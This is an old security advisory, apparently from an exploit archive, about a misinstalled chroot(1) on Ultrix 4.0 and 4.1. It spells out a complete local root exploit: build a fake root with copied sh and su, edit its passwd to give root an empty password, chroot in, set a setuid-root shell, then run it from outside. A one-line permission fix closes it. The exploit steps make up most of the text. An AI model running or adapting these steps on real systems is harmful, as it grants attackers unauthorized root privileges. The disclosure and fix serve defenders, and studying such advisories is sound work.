COMMAND

    chroot(1)

SYSTEMS AFFECTED

    Ultrix 4.0 and 4.1

PROBLEM

    By  default,  /usr/bin/chroot  is  improperly  installed.   System
    users can gain unauthorized privileges.

    mkdir root
    cd root
    mkdir bin etc usr
    cd bin
    cp /bin/sh sh
    cp /bin/su su
    cd ../etc
    cp /etc/passwd.orig passwd
    cp /etc/group group
    vi passwd (modify root password to root::0:0, etc)
    cd ..
    chroot /blah/blah/blah/root /bin/sh
    su
    chown root /bin/sh
    chmod 2755 /bin/sh
    chmod u+s /bin/sh
    {shit..  you gotta copy chmod & chown before you do the chroot}
    exit
    exit
    {now you're back in the original process}
    /blah/blah/blah/root/bin/sh

SOLUTION

    Change the permission on the file /usr/bin/chroot.

        # chmod 700 /usr/bin/chroot